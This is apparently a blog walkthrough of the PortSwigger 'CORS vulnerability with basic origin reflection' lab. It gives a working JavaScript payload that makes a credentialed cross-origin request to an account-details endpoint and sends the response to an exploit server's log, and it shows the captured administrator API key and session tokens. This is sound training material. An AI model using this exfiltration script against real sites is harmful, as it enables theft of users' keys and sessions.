What is Cross-origin resource sharing (CORS)

In Cross-origin resource sharing (CORS) vulnerabilities, Cross-Origin Resource Sharing is a security mechanism implemented in our web browsers. It controls the access to web application resources (such as fonts, scripts, images, etc.) from different origins through requests.

CORS vulnerabilities refer to situations where an attacker can exploit cross-origin resource sharing to compromise security.

Through CORS vulnerabilities, attackers can achieve vulnerabilities like CORS misconfiguration, cross-origin data leakage, cross-site request forgery (CSRF), etc.

Cross-origin resource sharing (CORS) Practical Labs

CORS vulnerability with basic origin reflection
CORS vulnerability with trusted null origin
CORS vulnerability with trusted insecure protocols

CORS vulnerability with basic origin reflection

Lab Description Of Cross-origin resource sharing (CORS)

This lab contains an insecure CORS configuration allowing all trusted origins. To solve the lab, you need to use JavaScript that utilizes CORS and retrieves the administrator’s API key. Upload the code to an exploit server. The lab will be solved when you submit the administrator’s API key.

You can use the username and password “wiener:peter” to log in to the lab.

Lab Solution Of Cross-origin resource sharing (CORS)

First, access the lab. After accessing it, open Burp Suite and enable the proxy in your browser.

Once you’ve done that, click on “my account” and log in using the provided credentials.

After logging in with Wiener’s account, you will see some details displayed.

You will receive a JSON-formatted GET /accountDetails request.

Send this request to the repeater tab for testing purposes.

Origin: https://example.com

Add an extra header to the request to see if the server allows it.

<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>

Replace “YOUR-LAB-ID” in the script with your lab ID (lab URL) and store it on the exploit server.

In my case, this is the lab ID: https://0aaa00b204a4d58580de498d00db003d.web-security-academy.net

https://0aaa00b204a4d58580de498d00db003d.web-security-academy.net

Updated script version:

<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0aaa00b204a4d58580de498d00db003d.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>

Copy this script and store it on the exploit server. Once stored, deliver the exploit to the victim.

After performing the above steps, click on “access log.”

"GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22nsLocr7bLZH3jTHwol2DylLNqOgpgQBQ%22,%20%20%22sessions%22:%20[%20%20%20%20%22qo3kg91owDRqGJdpWGtMB3ZIkUzhpLQl%22,%20%20%20%20%22pF6dqwK6kCxLsp2NoRms54HG76NiPHwP%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

You can see that a GET request has provided me with the administrator’s API key.

nsLocr7bLZH3jTHwol2DylLNqOgpgQBQ

Now, I will submit this key in the lab.

Now, I will submit this key in the lab.

By submitting the key in PortSwigger Web Security Lab, I have successfully solved the “CORS vulnerability with basic origin reflection” lab.

You can learn everything related to web security on our website. We upload the latest articles on web security topics on a daily basis, so stay with us.

Finally, you have completed the Cross-Site Scripting (XSS) topic and the next topic is Cross-Origin Resource Sharing (CORS), which you are currently reading. Please if you like the topic which is covered above then share it with your friends as well. The next topic to cover is WebSockets, Good Luck!

Also, Read Out: CORS Vulnerability With Trusted Insecure Protocols.

FAQs